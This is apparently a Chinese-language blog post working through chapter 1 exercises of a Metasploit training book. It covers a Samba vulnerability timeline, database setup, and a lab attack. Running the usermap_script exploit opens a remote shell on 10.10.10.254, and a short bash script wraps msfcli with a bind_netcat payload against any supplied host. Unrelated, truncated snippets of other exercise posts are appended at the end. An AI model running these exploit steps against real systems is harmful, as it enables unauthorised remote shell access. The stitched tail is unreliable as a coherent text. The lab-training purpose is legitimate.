《Metasploit魔鬼训练营》第一章习题

书本p391、The time line is as follows:

* May 7, 2007: Initial defect disclosure to the [email protected]

email alias.

* May 7, 2007: Initial developer response by Samba

developer Gerald Carter.

* May 9, 2007: Patch released by Samba developer Jeremy

Allison to iDefense for testing.

* May 10, Announcement to vendor-sec mailing list

* May 14, 2007: Public announcement of the security issue.

2、  先找出metasploit安装位置:

# dpkg -S metasploit

在/usr/share/metasploit-framework中

/usr/share/metasploit-framework/modules/exploits# ls
aix      apple_ios  dialup   freebsd  irix   multi    osx      unix
android  bsdi       firefox  hpux     linux  netware  solaris  windows

用Linux Shell命令统计出分别针对Windows 2000、Windows XP……目标环境的渗透攻击模块数量(不会,暂且跳过)

3、运行msfconsole:

msf > db_status
[*] postgresql selected, no connection

解决办法可参考:http://r-7.co/MSF-DEV#set-up-postgresql (太长,我还没试验过)

因为和书上有不少不同之处,我最后还是直接决定用作者提供的BT5虚拟镜像。

换上bt5后,好酷炫的界面!但是ip地址是10.10.10.129,和剧本不符!重新设置下:

# vi /etc/networks/interface
…skip…(将ip配置为静态的10.10.10.128)
# /etc/init.d/networking restart

打开msfconsole:

msf > db_status
[*] postgresql connected to msf3dev

补充: 关于kali 2.0中msf与数据库连接的问题,可参考http://www.cnblogs.com/justforfun12/p/5205804.html

数据库的问题解决!

msf> use exploit/multi/samba/usermap_script
msf> show options
msf> set RHOST 10.10.10.254
msf> exploit[*] Command shell session 1 opened (10.10.10.128:4444 -> 10.10.10.254:33721)

成功得到shell

VNC不熟悉,暂且跳过。

5、

# vim us_attack.sh
  1 #!/bin/bash
  2 #
  3 # A shell script that uses usermap_script exploit to penetrate
  4 # other‘s system.
  5 # User needs to input the ip for RHOST as the only parameter.
  6 #
  7 # 2016.2.21     by Jack
  8 #
  9
 10 msfcli multi/samba/usermap_script PAYLOAD=/cmd/unix/bind_netcat   RHOST=$1 E 

执行

# sh us_attack.sh 10.10.10.254

搞定!

不过发现了个问题:就是一开始从BT5去ping 10.10.10.254(NAT)是ping 不通的,需要先从NAT ping回10.10.10.128(NAT)才行。

用BT5其实也有很大问题,因为它的服务器停止更新,APT-GET 不能用了!

时间: 2024-10-27 13:12:56

《Metasploit魔鬼训练营》第一章习题的相关文章

第一章习题

1.2 #include <iostream>#include <stdio.h>#include <vector>#include <iterator>#include <stdlib.h>using namespace std; char arr[20][20]; char words[30][4]={ "boy","own","sad","job","

编程珠玑第一章习题

第一章习题1解析 以下代码均使用MSVC 6.0编译运行通过,为了便于学习,在原代码的基础上进行了一定的修改. 1.如何使用一个具有库的语言来实现一种排序算法以表示和排序集合,将代码实现可用 1 #include<stdio.h> 2 #include<stdlib.h> 3 int comp(const void *x,const void *y){ 4 return (*(int*)x-*(int*)y); 5 } 6 int a[5]={45,25,64,10,4}; 7 v

编程珠玑第一章习题答案

习题 1.1      如果不缺内存,如何使用一个具有库的语言来实现一种排序算法? 因为C++有sort,JAVA也有,这里以C++为例给出,记住如果用set集合来排序时,是不可以有元素重复的 代码: #include <iostream> #include <cstring> #include <cmath> #include <queue> #include <stack> #include <list> #include <

算法竞赛入门经典(第二版) - 第一章 习题

习题1-1 平均数(average) 1 #include <stdio.h> 2 int main(void) 3 { 4 int a, b, c; 5 scanf("%d %d %d", &a, &b, &c); 6 printf("%.3f\n", (a + b + c) / 3.0); 7 return 0; 8 } 习题1-2 温度(temperature) 1 #include <stdio.h> 2 in

算法竞赛入门经典(第二版)第一章习题

习题1-1 平均数输入3个整数,输出他们的平均值,保留三位小数. #include<stdio.h>int main(){double a,b,c;//必须先定义好要输入的数据类型scanf("%lf%lf%lf",&a,&b,&c);printf("%.3lf",(a+b+c)/3.0);} 习题1-2 温度输入华氏温度f,输出对应的摄氏温度c,保留3位小数.提示c=5(f-32)/9 #include <stdio.h&

编程珠玑第一章习题6.1000个整数排序

题目描述: 1~1000万的整数,随机挑出1000个整数(可重复),每个整数最多可以出现10次.将这些整数按照升序排序. 分析:      1000个整数,我们可以用1000万个字符按大小来记录它出现的次数,如同 3, 1, 5, 6,5  用5个字符数组表示就是 { 1, 0, 1, 0, 2, 1}.1出现1次,所以第一个字符就用1记录:2出现0次,用0记录,以此类推. 然后,我们按从左往右的顺序,第 i 索引的字符是多少,就输出多少遍该索引(索引即是你要输出的整数).输出结果是:1,3,5

第一章习题 140705010030 李蓥

1.数据压缩的一个基本问题是“我们要压缩什么”,对此你是怎样理解的? 答:数据压缩是指不丢失有用信息的前提下,以最少的数码表示信号源所发的信号,减少容纳给定消息集合或数据采样集合的信号空间.所谓的被压缩对象指物理空间.时间区间.电磁频段.如压缩图片.声音.视频等等,便于存储和传输. 2.数据压缩的另一个基本问题是“为什么进行压缩”,对此你是怎样理解的? 答:经过数据压缩可以将一些占用内存比较大多媒体数据,压缩成可以缩小的文件内存,这样可以方便传递.压缩本质上是为了降低费用,增加性能. 6.数据压

The C Programming Language第二版第一章习题(部分)

1.8 编写一个统计空格,制表符与换行符个数的程序 1 #include <stdio.h> 2 main(){ 3 int c,nl,tl,kl; 4 nl=tl=kl=0; 5 6 while( (c=getchar()) != EOF ){ 7 if(c=='\n') 8 ++nl; 9 if(c=='\t') 10 ++tl; 11 if(c==' ') 12 ++kl; 13 } 14 printf("空格 换行符 制表符\n"); 15 printf("

具体数学第二版第一章习题(2)

16.令$n=2^{m}+t,0\leq t < 2^{m}$,即$n=({1b_{m-1}b_{m-2}...b_{2}b_{1}b_{0}})_{2}$.令$g(n)=A_{n}\alpha +B_{n}\gamma +C_{n}\beta _{0}+D_{n}\beta _{1}$ (1)设$\alpha =1,\beta _{0}=\beta _{1}=\gamma =0$,那么可以得到$g(1)=1,g(2n)=g(2n+1)=3g(n)$,所以$g(n)=3^{m}=A_{n}\al